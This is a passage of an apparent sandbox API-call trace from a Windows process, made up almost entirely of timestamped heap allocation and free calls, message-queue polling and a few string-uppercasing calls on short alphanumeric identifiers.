0x2a71a38 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0209.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1096) returned 0x2a9ca80 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.571] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0209.572] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0209.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0209.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0209.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.573] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0209.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0209.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.574] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.574] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0209.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0209.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0209.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0209.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0209.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0209.576] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa80 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.576] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0209.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.576] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0209.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0209.577] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0209.577] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0209.577] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0209.577] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0209.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.577] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.578] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.578] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0209.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.579] HeapFree (in: hHeap=0x2af0000, 